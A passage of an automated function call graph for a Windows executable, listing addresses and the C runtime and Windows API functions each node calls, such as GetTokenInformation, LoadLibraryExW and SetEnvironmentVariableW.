7ff79dad2855 16679->16681 16680->16681 16682 7ff79dadb870 _log10_special 8 API calls 16681->16682 16683 7ff79dad2865 16682->16683 16683->15944 16685 7ff79dad1b06 16684->16685 16686 7ff79dadf439 16684->16686 16685->15943 16685->15944 16687 7ff79dae43f4 _get_daylight 11 API calls 16686->16687 16688 7ff79dadf43e 16687->16688 16689 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16688->16689 16689->16685 16691 7ff79dadf7ee 16690->16691 16692 7ff79dadf7ae 16690->16692 16691->16692 16694 7ff79dadf7fa 16691->16694 16693 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16692->16693 16700 7ff79dadf7d5 16693->16700 16701 7ff79dae477c EnterCriticalSection 16694->16701 16700->16663 16703 7ff79dadf706 16702->16703 16704 7ff79dad19b9 16702->16704 16703->16704 16705 7ff79dadf715 memcpy_s 16703->16705 16706 7ff79dadf752 16703->16706 16704->15921 16704->15922 16709 7ff79dae43f4 _get_daylight 11 API calls 16705->16709 16715 7ff79dae477c EnterCriticalSection 16706->16715 16711 7ff79dadf72a 16709->16711 16713 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16711->16713 16713->16704 16720 7ff79dae3cfe 16716->16720 16717 7ff79dae3d23 16718 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16717->16718 16722 7ff79dae3d4d 16718->16722 16719 7ff79dae3d5f 16746 7ff79dae1f30 16719->16746 16720->16717 16720->16719 16725 7ff79dadb870 _log10_special 8 API calls 16722->16725 16723 7ff79dae3e3c 16724 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16723->16724 16724->16722 16727 7ff79dad27d8 16725->16727 16734 7ff79dae4480 16727->16734 16728 7ff79dae3e60 16728->16723 16731 7ff79dae3e6a 16728->16731 16729 7ff79dae3e11 16732 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16729->16732 16730 7ff79dae3e08 16730->16723 16730->16729 16733 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16731->16733 16732->16722 16733->16722 16735 7ff79daea5d8 _get_daylight 11 API calls 16734->16735 16736 7ff79dae4497 16735->16736 16737 7ff79dad27df 16736->16737 16738 7ff79daedea8 _get_daylight 11 API calls 16736->16738 16741 7ff79dae44d7 16736->16741 16737->16675 16739 7ff79dae44cc 16738->16739 16740 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16739->16740 16740->16741 16741->16737 16884 7ff79daedf30 16741->16884 16744 7ff79dae9c10 _isindst 17 API calls 16745 7ff79dae451c 16744->16745 16747 7ff79dae1f6e 16746->16747 16748 7ff79dae1f5e 16746->16748 16749 7ff79dae1f77 16747->16749 16756 7ff79dae1fa5 16747->16756 16752 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16748->16752 16750 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16749->16750 16751 7ff79dae1f9d 16750->16751 16751->16723 16751->16728 16751->16729 16751->16730 16752->16751 16753 7ff79dae3ae0 45 API calls 16753->16756 16755 7ff79dae2254 16758 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16755->16758 16756->16748 16756->16751 16756->16753 16756->16755 16760 7ff79dae28c0 16756->16760 16786 7ff79dae2588 16756->16786 16816 7ff79dae1e10 16756->16816 16758->16748 16761 7ff79dae2975 16760->16761 16762 7ff79dae2902 16760->16762 16765 7ff79dae29cf 16761->16765 16766 7ff79dae297a 16761->16766 16763 7ff79dae299f 16762->16763 16764 7ff79dae2908 16762->16764 16833 7ff79dae0e70 16763->16833 16772 7ff79dae290d 16764->16772 16775 7ff79dae29de 16764->16775 16765->16763 16765->16775 16784 7ff79dae2938 16765->16784 16767 7ff79dae29af 16766->16767 16768 7ff79dae297c 16766->16768 16840 7ff79dae0a60 16767->16840 16769 7ff79dae291d 16768->16769 16774 7ff79dae298b 16768->16774 16785 7ff79dae2a0d 16769->16785 16819 7ff79dae3224 16769->16819 16772->16769 16776 7ff79dae2950 16772->16776 16772->16784 16774->16763 16778 7ff79dae2990 16774->16778 16775->16785 16847 7ff79dae1280 16775->16847 16776->16785 16829 7ff79dae36e0 16776->16829 16781 7ff79dae3878 37 API calls 16778->16781 16778->16785 16780 7ff79dadb870 _log10_special 8 API calls 16782 7ff79dae2ca3 16780->16782 16781->16784 16782->16756 16784->16785 16854 7ff79daedb68 16784->16854 16785->16780 16787 7ff79dae25a9 16786->16787 16788 7ff79dae2593 16786->16788 16789 7ff79dae25e7 16787->16789 16790 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16787->16790 16788->16789 16791 7ff79dae2975 16788->16791 16792 7ff79dae2902 16788->16792 16789->16756 16790->16789 16795 7ff79dae29cf 16791->16795 16796 7ff79dae297a 16791->16796 16793 7ff79dae299f 16792->16793 16794 7ff79dae2908 16792->16794 16800 7ff79dae0e70 38 API calls 16793->16800 16803 7ff79dae290d 16794->16803 16806 7ff79dae29de 16794->16806 16795->16793 16795->16806 16814 7ff79dae2938 16795->16814 16797 7ff79dae29af 16796->16797 16798 7ff79dae297c 16796->16798 16801 7ff79dae0a60 38 API calls 16797->16801 16799 7ff79dae291d 16798->16799 16804 7ff79dae298b 16798->16804 16802 7ff79dae3224 47 API calls 16799->16802 16815 7ff79dae2a0d 16799->16815 16800->16814 16801->16814 16802->16814 16803->16799 16805 7ff79dae2950 16803->16805 16803->16814 16804->16793 16808 7ff79dae2990 16804->16808 16809 7ff79dae36e0 47 API calls 16805->16809 16805->16815 16807 7ff79dae1280 38 API calls 16806->16807 16806->16815 16807->16814 16811 7ff79dae3878 37 API calls 16808->16811 16808->16815 16809->16814 16810 7ff79dadb870 _log10_special 8 API calls 16812 7ff79dae2ca3 16810->16812 16811->16814 16812->16756 16813 7ff79daedb68 47 API calls 16813->16814 16814->16813 16814->16815 16815->16810 16867 7ff79dae0034 16816->16867 16820 7ff79dae3246 16819->16820 16821 7ff79dadfea0 12 API calls 16820->16821 16822 7ff79dae328e 16821->16822 16823 7ff79daed880 46 API calls 16822->16823 16824 7ff79dae3361 16823->16824 16825 7ff79dae3ae0 45 API calls 16824->16825 16828 7ff79dae3383 16824->16828 16825->16828 16826 7ff79dae340c 16826->16784 16826->16826 16827 7ff79dae3ae0 45 API calls 16827->16826 16828->16826 16828->16827 16828->16828 16830 7ff79dae36f8 16829->16830 16832 7ff79dae3760 16829->16832 16831 7ff79daedb68 47 API calls 16830->16831 16830->16832 16831->16832 16832->16784 16834 7ff79dae0ea3 16833->16834 16835 7ff79dae0ed2 16834->16835 16837 7ff79dae0f8f 16834->16837 16836 7ff79dadfea0 12 API calls 16835->16836 16838 7ff79dae0f0f 16835->16838 16836->16838 16839 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16837->16839 16838->16784 16839->16838 16841 7ff79dae0a93 16840->16841 16842 7ff79dae0ac2 16841->16842 16844 7ff79dae0b7f 16841->16844 16843 7ff79dadfea0 12 API calls 16842->16843 16846 7ff79dae0aff 16842->16846 16843->16846 16845 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16844->16845 16845->16846 16846->16784 16848 7ff79dae12b3 16847->16848 16849 7ff79dae12e2 16848->16849 16851 7ff79dae139f 16848->16851 16850 7ff79dadfea0 12 API calls 16849->16850 16853 7ff79dae131f 16849->16853 16850->16853 16852 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16851->16852 16852->16853 16853->16784 16855 7ff79daedb90 16854->16855 16856 7ff79daedbd5 16855->16856 16857 7ff79dae3ae0 45 API calls 16855->16857 16858 7ff79daedb95 memcpy_s 16855->16858 16863 7ff79daedbbe memcpy_s 16855->16863 16856->16858 16856->16863 16864 7ff79daefaf8 16856->16864 16857->16856 16858->16784 16859 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16859->16858 16863->16858 16863->16859 16866 7ff79daefb1c WideCharToMultiByte 16864->16866 16868 7ff79dae0073 16867->16868 16869 7ff79dae0061 16867->16869 16872 7ff79dae0080 16868->16872 16876 7ff79dae00bd 16868->16876 16870 7ff79dae43f4 _get_daylight 11 API calls 16869->16870 16871 7ff79dae0066 16870->16871 16873 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16871->16873 16874 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16872->16874 16877 7ff79dae0071 16873->16877 16874->16877 16875 7ff79dae0166 16875->16877 16879 7ff79dae43f4 _get_daylight 11 API calls 16875->16879 16876->16875 16878 7ff79dae43f4 _get_daylight 11 API calls 16876->16878 16877->16756 16880 7ff79dae015b 16878->16880 16881 7ff79dae0210 16879->16881 16882 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16880->16882 16883 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16881->16883 16882->16875 16883->16877 16889 7ff79daedf4d 16884->16889 16885 7ff79daedf52 16886 7ff79dae44fd 16885->16886 16887 7ff79dae43f4 _get_daylight 11 API calls 16885->16887 16886->16737 16886->16744 16888 7ff79daedf5c 16887->16888 16890 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16888->16890 16889->16885 16889->16886 16891 7ff79daedf9c 16889->16891 16890->16886 16891->16886 16892 7ff79dae43f4 _get_daylight 11 API calls 16891->16892 16892->16888 16894 7ff79dae7555 16893->16894 16895 7ff79dae7568 16893->16895 16896 7ff79dae43f4 _get_daylight 11 API calls 16894->16896 16903 7ff79dae71cc 16895->16903 16898 7ff79dae755a 16896->16898 16901 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16898->16901 16900 7ff79dae7566 16900->15962 16901->16900 16910 7ff79daef5e8 EnterCriticalSection 16903->16910 16912 7ff79dad7c13 __vcrt_freefls 16911->16912 16913 7ff79dad7b91 GetTokenInformation 16911->16913 16916 7ff79dad7c26 CloseHandle 16912->16916 16917 7ff79dad7c2c 16912->16917 16914 7ff79dad7bb2 GetLastError 16913->16914 16915 7ff79dad7bbd 16913->16915 16914->16912 16914->16915 16915->16912 16918 7ff79dad7bd9 GetTokenInformation 16915->16918 16916->16917 16917->15971 16918->16912 16919 7ff79dad7bfc 16918->16919 16919->16912 16920 7ff79dad7c06 ConvertSidToStringSidW 16919->16920 16920->16912 16922 7ff79dad297a 16921->16922 17206 7ff79dad3f70 108 API calls 17205->17206 17207 7ff79dad1463 17206->17207 17208 7ff79dad146b 17207->17208 17209 7ff79dad148c 17207->17209 17210 7ff79dad25f0 53 API calls 17208->17210 17211 7ff79dadf9f4 73 API calls 17209->17211 17212 7ff79dad147b 17210->17212 17213 7ff79dad14a1 17211->17213 17212->16030 17214 7ff79dad14a5 17213->17214 17216 7ff79dad14c1 17213->17216 17215 7ff79dad2760 53 API calls 17214->17215 17224 7ff79dad14bc __vcrt_freefls 17215->17224 17217 7ff79dad14f1 17216->17217 17218 7ff79dad14d1 17216->17218 17220 7ff79dad14f7 17217->17220 17226 7ff79dad150a 17217->17226 17219 7ff79dad2760 53 API calls 17218->17219 17219->17224 17229 7ff79dad11f0 17220->17229 17221 7ff79dadf36c 74 API calls 17223 7ff79dad1584 17221->17223 17223->16030 17224->17221 17225 7ff79dadf6bc _fread_nolock 53 API calls 17225->17226 17226->17224 17226->17225 17227 7ff79dad1596 17226->17227 17228 7ff79dad2760 53 API calls 17227->17228 17228->17224 17230 7ff79dad1248 17229->17230 17231 7ff79dad124f 17230->17231 17232 7ff79dad1277 17230->17232 17233 7ff79dad25f0 53 API calls 17231->17233 17235 7ff79dad1291 17232->17235 17236 7ff79dad12ad 17232->17236 17234 7ff79dad1262 17233->17234 17234->17224 17237 7ff79dad2760 53 API calls 17235->17237 17238 7ff79dad12bf 17236->17238 17246 7ff79dad12db memcpy_s 17236->17246 17242 7ff79dad12a8 __vcrt_freefls 17237->17242 17239 7ff79dad2760 53 API calls 17238->17239 17239->17242 17240 7ff79dadf6bc _fread_nolock 53 API calls 17240->17246 17241 7ff79dadf430 37 API calls 17241->17246 17242->17224 17243 7ff79dad139f 17246->17240 17246->17241 17246->17242 17246->17243 17247 7ff79dadfdfc 17246->17247 17267 7ff79dad3f1a 17266->17267 17268 7ff79dad86b0 2 API calls 17267->17268 17269 7ff79dad3f3f 17268->17269 17270 7ff79dadb870 _log10_special 8 API calls 17269->17270 17271 7ff79dad3f67 17270->17271 17271->16055 17273 7ff79dad753e 17272->17273 17274 7ff79dad7662 17273->17274 17275 7ff79dad1bf0 49 API calls 17273->17275 17276 7ff79dadb870 _log10_special 8 API calls 17274->17276 17279 7ff79dad75c5 17275->17279 17277 7ff79dad7693 17276->17277 17277->16055 17278 7ff79dad1bf0 49 API calls 17278->17279 17279->17274 17279->17278 17280 7ff79dad3f10 10 API calls 17279->17280 17281 7ff79dad761b 17279->17281 17280->17279 17282 7ff79dad86b0 2 API calls 17281->17282 17283 7ff79dad7633 CreateDirectoryW 17282->17283 17283->17274 17283->17279 17285 7ff79dad15d3 17284->17285 17286 7ff79dad15f7 17284->17286 17373 7ff79dad1050 17285->17373 17288 7ff79dad3f70 108 API calls 17286->17288 17290 7ff79dad160b 17288->17290 17289 7ff79dad15d8 17291 7ff79dad15ee 17289->17291 17295 7ff79dad25f0 53 API calls 17289->17295 17292 7ff79dad1613 17290->17292 17293 7ff79dad163b 17290->17293 17291->16055 17296 7ff79dad2760 53 API calls 17292->17296 17294 7ff79dad3f70 108 API calls 17293->17294 17298 7ff79dad164f 17294->17298 17295->17291 17297 7ff79dad162a 17296->17297 17297->16055 17299 7ff79dad1671 17298->17299 17300 7ff79dad1657 17298->17300 17302 7ff79dadf9f4 73 API calls 17299->17302 17301 7ff79dad25f0 53 API calls 17300->17301 17303 7ff79dad1667 17301->17303 17304 7ff79dad1686 17302->17304 17323 7ff79dad694b 17322->17323 17325 7ff79dad6904 17322->17325 17323->16055 17325->17323 17412 7ff79dae4250 17325->17412 17327 7ff79dad3b51 17326->17327 17328 7ff79dad3e90 49 API calls 17327->17328 17329 7ff79dad3b8b 17328->17329 17330 7ff79dad3e90 49 API calls 17329->17330 17331 7ff79dad3b9b 17330->17331 17332 7ff79dad3bec 17331->17332 17333 7ff79dad3bbd 17331->17333 17334 7ff79dad3ac0 51 API calls 17332->17334 17443 7ff79dad3ac0 17333->17443 17336 7ff79dad3bea 17334->17336 17371 7ff79dad1bf0 49 API calls 17370->17371 17372 7ff79dad3e24 17371->17372 17372->16055 17374 7ff79dad3f70 108 API calls 17373->17374 17375 7ff79dad108b 17374->17375 17376 7ff79dad1093 17375->17376 17377 7ff79dad10a8 17375->17377 17378 7ff79dad25f0 53 API calls 17376->17378 17379 7ff79dadf9f4 73 API calls 17377->17379 17384 7ff79dad10a3 __vcrt_freefls 17378->17384 17380 7ff79dad10bd 17379->17380 17381 7ff79dad10c1 17380->17381 17382 7ff79dad10dd 17380->17382 17384->17289 17413 7ff79dae425d 17412->17413 17414 7ff79dae428a 17412->17414 17415 7ff79dae43f4 _get_daylight 11 API calls 17413->17415 17419 7ff79dae4214 17413->17419 17416 7ff79dae42ad 17414->17416 17417 7ff79dae42c9 17414->17417 17418 7ff79dae4267 17415->17418 17420 7ff79dae43f4 _get_daylight 11 API calls 17416->17420 17427 7ff79dae4178 17417->17427 17422 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 17418->17422 17419->17325 17423 7ff79dae42b2 17420->17423 17424 7ff79dae4272 17422->17424 17425 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 17423->17425 17424->17325 17426 7ff79dae42bd 17425->17426 17426->17325 17428 7ff79dae419c 17427->17428 17429 7ff79dae4197 17427->17429 17428->17429 17430 7ff79daea460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17428->17430 17429->17426 17431 7ff79dae41b7 17430->17431 17435 7ff79daecc94 17431->17435 17444 7ff79dad3ae6 17443->17444 17507 7ff79dadbe12 RtlLookupFunctionEntry 17506->17507 17508 7ff79dadbc2b 17507->17508 17509 7ff79dadbe28 RtlVirtualUnwind 17507->17509 17510 7ff79dadbbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17508->17510 17509->17507 17509->17508 17512 7ff79dae51d8 17511->17512 17513 7ff79dae51fe 17512->17513 17516 7ff79dae5231 17512->17516 17514 7ff79dae43f4 _get_daylight 11 API calls 17513->17514 17515 7ff79dae5203 17514->17515 17519 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 17515->17519 17517 7ff79dae5244 17516->17517 17518 7ff79dae5237 17516->17518 17530 7ff79dae9f38 17517->17530 17520 7ff79dae43f4 _get_daylight 11 API calls 17518->17520 17522 7ff79dad3fc6 17519->17522 17520->17522 17522->16091 17543 7ff79daef5e8 EnterCriticalSection 17530->17543 17903 7ff79dae6c08 17902->17903 17906 7ff79dae66e4 17903->17906 17905 7ff79dae6c21 17905->16101 17907 7ff79dae66ff 17906->17907 17908 7ff79dae672e 17906->17908 17909 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 17907->17909 17916 7ff79dae477c EnterCriticalSection 17908->17916 17911 7ff79dae671f 17909->17911 17911->17905 17918 7ff79dadf163 17917->17918 17920 7ff79dadf191 17917->17920 17919 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 17918->17919 17921 7ff79dadf183 17919->17921 17920->17921 17927 7ff79dae477c EnterCriticalSection 17920->17927 17921->16105 17929 7ff79dad86b0 2 API calls 17928->17929 17930 7ff79dad81b4 LoadLibraryExW 17929->17930 17931 7ff79dad81d3 __vcrt_freefls 17930->17931 17931->16135 17933 7ff79dad6ef3 GetProcAddress 17932->17933 17934 7ff79dad6ec9 17932->17934 17933->17934 17935 7ff79dad6f18 GetProcAddress 17933->17935 17936 7ff79dad29e0 51 API calls 17934->17936 17935->17934 17937 7ff79dad6f3d GetProcAddress 17935->17937 17938 7ff79dad6ee3 17936->17938 17937->17934 17938->16142 17998 7ff79dad5b05 17997->17998 17999 7ff79dad1bf0 49 API calls 17998->17999 18000 7ff79dad5b41 17999->18000 18001 7ff79dad5b6d 18000->18001 18002 7ff79dad5b4a 18000->18002 18004 7ff79dad3fe0 49 API calls 18001->18004 18003 7ff79dad25f0 53 API calls 18002->18003 18005 7ff79dad5b63 18003->18005 18006 7ff79dad5b85 18004->18006 18008 7ff79dadb870 _log10_special 8 API calls 18005->18008 18007 7ff79dad5ba3 18006->18007 18009 7ff79dad25f0 53 API calls 18006->18009 18010 7ff79dad3f10 10 API calls 18007->18010 18011 7ff79dad308e 18008->18011 18009->18007 18012 7ff79dad5bad 18010->18012 18011->16175 18028 7ff79dad5c80 18011->18028 18013 7ff79dad5bbb 18012->18013 18015 7ff79dad81a0 3 API calls 18012->18015 18014 7ff79dad3fe0 49 API calls 18013->18014 18016 7ff79dad5bd4 18014->18016 18015->18013 18017 7ff79dad5bf9 18016->18017 18018 7ff79dad5bd9 18016->18018 18020 7ff79dad81a0 3 API calls 18017->18020 18019 7ff79dad25f0 53 API calls 18018->18019 18019->18005 18021 7ff79dad5c06 18020->18021 18167 7ff79dad4c80 18028->18167 18030 7ff79dad5cba 18031 7ff79dad5cd3 18030->18031 18032 7ff79dad5cc2 18030->18032 18174 7ff79dad4450 18031->18174 18033 7ff79dad25f0 53 API calls 18032->18033 18168 7ff79dad4cac 18167->18168 18169 7ff79dad4cb4 18168->18169 18170 7ff79dad4e54 18168->18170 18205 7ff79dae5db4 18168->18205 18169->18030 18171 7ff79dad5017 __vcrt_freefls 18170->18171 18172 7ff79dad4180 47 API calls 18170->18172 18171->18030 18172->18170 18206 7ff79dae5de4 18205->18206 18209 7ff79dae52b0 18206->18209 18210 7ff79dae52f3 18209->18210 18211 7ff79dae52e1 18209->18211 18213 7ff79dae533d 18210->18213 18216 7ff79dae5300 18210->18216 18212 7ff79dae43f4 _get_daylight 11 API calls 18211->18212 18285->16178 18287 7ff79daea460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18286->18287 18288 7ff79dae96f1 18287->18288 18291 7ff79dae9814 18288->18291 18300 7ff79daf2960 18291->18300 18326 7ff79daf2918 18300->18326 18331 7ff79daef5e8 EnterCriticalSection 18326->18331 18501 7ff79daefbd8 18502 7ff79daefbfc 18501->18502 18505 7ff79daefc0c 18501->18505 18503 7ff79dae43f4 _get_daylight 11 API calls 18502->18503 18504 7ff79daefc01 18503->18504 18506 7ff79daefeec 18505->18506 18507 7ff79daefc2e 18505->18507 18508 7ff79dae43f4 _get_daylight 11 API calls 18506->18508 18509 7ff79daefc4f 18507->18509 18632 7ff79daf0294 18507->18632 18510 7ff79daefef1 18508->18510 18513 7ff79daefcc1 18509->18513 18515 7ff79daefc75 18509->18515 18523 7ff79daefcb5 18509->18523 18512 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18510->18512 18512->18504 18518 7ff79daedea8 _get_daylight 11 API calls 18513->18518 18528 7ff79daefc84 18513->18528 18514 7ff79daefd6e 18521 7ff79daefddd 18514->18521 18526 7ff79daefd8b 18514->18526 18647 7ff79dae89d8 18515->18647 18519 7ff79daefcd7 18518->18519 18524 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18519->18524 18521->18528 18534 7ff79daf26ec 40 API calls 18521->18534 18522 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18522->18504 18523->18514 18523->18528 18653 7ff79daf643c 18523->18653 18531 7ff79daefce5 18524->18531 18525 7ff79daefc7f 18527 7ff79dae43f4 _get_daylight 11 API calls 18525->18527 18529 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18526->18529 18527->18528 18528->18522 18532 7ff79daefd94 18529->18532 18530 7ff79daefc9d 18530->18523 18533 7ff79daf0294 45 API calls 18530->18533 18531->18523 18531->18528 18535 7ff79daedea8 _get_daylight 11 API calls 18531->18535 18543 7ff79daefd99 18532->18543 18689 7ff79daf26ec 18532->18689 18533->18523 18536 7ff79daefe1a 18534->18536 18537 7ff79daefd07 18535->18537 18538 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18536->18538 18540 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18537->18540 18541 7ff79daefe24 18538->18541 18540->18523 18541->18528 18541->18543 18542 7ff79daefee0 18546 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18542->18546 18543->18542 18547 7ff79daedea8 _get_daylight 11 API calls 18543->18547 18544 7ff79daefdc5 18545 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18544->18545 18545->18543 18546->18504 18548 7ff79daefe68 18547->18548 18549 7ff79daefe70 18548->18549 18550 7ff79daefe79 18548->18550 18551 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18549->18551 18552 7ff79dae97b4 __std_exception_copy 37 API calls 18550->18552 18553 7ff79daefe77 18551->18553 18554 7ff79daefe88 18552->18554 18558 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18553->18558 18555 7ff79daefe90 18554->18555 18556 7ff79daeff1b 18554->18556 18698 7ff79daf6554 18555->18698 18557 7ff79dae9c10 _isindst 17 API calls 18556->18557 18560 7ff79daeff2f 18557->18560 18558->18504 18562 7ff79daeff58 18560->18562 18570 7ff79daeff68 18560->18570 18565 7ff79dae43f4 _get_daylight 11 API calls 18562->18565 18563 7ff79daefeb7 18567 7ff79dae43f4 _get_daylight 11 API calls 18563->18567 18564 7ff79daefed8 18566 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18564->18566 18594 7ff79daeff5d 18565->18594 18566->18542 18568 7ff79daefebc 18567->18568 18569 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18568->18569 18569->18553 18571 7ff79daf024b 18570->18571 18572 7ff79daeff8a 18570->18572 18573 7ff79dae43f4 _get_daylight 11 API calls 18571->18573 18574 7ff79daeffa7 18572->18574 18717 7ff79daf037c 18572->18717 18575 7ff79daf0250 18573->18575 18578 7ff79daf001b 18574->18578 18579 7ff79daeffcf 18574->18579 18584 7ff79daf000f 18574->18584 18577 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18575->18577 18577->18594 18582 7ff79daf0043 18578->18582 18585 7ff79daedea8 _get_daylight 11 API calls 18578->18585 18599 7ff79daeffde 18578->18599 18732 7ff79dae8a14 18579->18732 18580 7ff79daf00ce 18593 7ff79daf00eb 18580->18593 18600 7ff79daf013e 18580->18600 18582->18584 18587 7ff79daedea8 _get_daylight 11 API calls 18582->18587 18582->18599 18584->18580 18584->18599 18738 7ff79daf62fc 18584->18738 18589 7ff79daf0035 18585->18589 18592 7ff79daf0065 18587->18592 18588 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18588->18594 18595 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18589->18595 18590 7ff79daeffd9 18596 7ff79dae43f4 _get_daylight 11 API calls 18590->18596 18591 7ff79daefff7 18591->18584 18602 7ff79daf037c 45 API calls 18591->18602 18597 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18592->18597 18598 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18593->18598 18595->18582 18596->18599 18597->18584 18601 7ff79daf00f4 18598->18601 18599->18588 18600->18599 18603 7ff79daf26ec 40 API calls 18600->18603 18605 7ff79daf26ec 40 API calls 18601->18605 18608 7ff79daf00fa 18601->18608 18602->18584 18604 7ff79daf017c 18603->18604 18606 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18604->18606 18609 7ff79daf0126 18605->18609 18610 7ff79daf0186 18606->18610 18607 7ff79daf023f 18612 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18607->18612 18608->18607 18613 7ff79daedea8 _get_daylight 11 API calls 18608->18613 18611 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18609->18611 18610->18599 18610->18608 18611->18608 18612->18594 18614 7ff79daf01cb 18613->18614 18615 7ff79daf01d3 18614->18615 18616 7ff79daf01dc 18614->18616 18617 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18615->18617 18618 7ff79daef784 37 API calls 18616->18618 18619 7ff79daf01da 18617->18619 18620 7ff79daf01ea 18618->18620 18624 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18619->18624 18621 7ff79daf01f2 SetEnvironmentVariableW 18620->18621 18622 7ff79daf027f 18620->18622 18625 7ff79daf0216 18621->18625 18626 7ff79daf0237 18621->18626 18623 7ff79dae9c10 _isindst 17 API calls 18622->18623 18627 7ff79daf0293 18623->18627 18624->18594 18629 7ff79dae43f4 _get_daylight 11 API calls 18625->18629 18628 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18626->18628 18628->18607 18630 7ff79daf021b 18629->18630 18631 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18630->18631 18631->18619 18633 7ff79daf02c9 18632->18633 18640 7ff79daf02b1 18632->18640 18634 7ff79daedea8 _get_daylight 11 API calls 18633->18634 18635 7ff79daf02ed 18634->18635 18636 7ff79daf034e 18635->18636 18641 7ff79daedea8 _get_daylight 11 API calls 18635->18641 18642 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18635->18642 18643 7ff79dae97b4 __std_exception_copy 37 API calls 18635->18643 18644 7ff79daf035d 18635->18644 18646 7ff79daf0372 18635->18646 18638 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18636->18638 18637 7ff79dae9814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18639 7ff79daf0378 18637->18639 18638->18640 18640->18509 18641->18635 18642->18635 18643->18635 18645 7ff79dae9c10 _isindst 17 API calls 18644->18645 18645->18646 18646->18637 18648 7ff79dae89f1 18647->18648 18649 7ff79dae89e8 18647->18649 18648->18525 18648->18530 18649->18648 18762 7ff79dae84b0 18649->18762 18654 7ff79daf5564 18653->18654 18655 7ff79daf6449 18653->18655 18656 7ff79daf5571 18654->18656 18661 7ff79daf55a7 18654->18661 18657 7ff79dae4178 45 API calls 18655->18657 18659 7ff79dae43f4 _get_daylight 11 API calls 18656->18659 18676 7ff79daf5518 18656->18676 18658 7ff79daf647d 18657->18658 18665 7ff79daf6493 18658->18665 18668 7ff79daf64aa 18658->18668 18687 7ff79daf6482 18658->18687 18662 7ff79daf557b 18659->18662 18660 7ff79daf55d1 18663 7ff79dae43f4 _get_daylight 11 API calls 18660->18663 18661->18660 18664 7ff79daf55f6 18661->18664 18666 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18662->18666 18667 7ff79daf55d6 18663->18667 18672 7ff79dae4178 45 API calls 18664->18672 18679 7ff79daf55e1 18664->18679 18669 7ff79dae43f4 _get_daylight 11 API calls 18665->18669 18670 7ff79daf5586 18666->18670 18671 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18667->18671 18674 7ff79daf64c6 18668->18674 18675 7ff79daf64b4 18668->18675 18673 7ff79daf6498 18669->18673 18670->18523 18671->18679 18672->18679 18680 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18673->18680 18677 7ff79daf64ee 18674->18677 18678 7ff79daf64d7 18674->18678 18681 7ff79dae43f4 _get_daylight 11 API calls 18675->18681 18676->18523 18994 7ff79daf825c 18677->18994 18985 7ff79daf55b4 18678->18985 18679->18523 18680->18687 18684 7ff79daf64b9 18681->18684 18686 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18684->18686 18686->18687 18687->18523 18688 7ff79dae43f4 _get_daylight 11 API calls 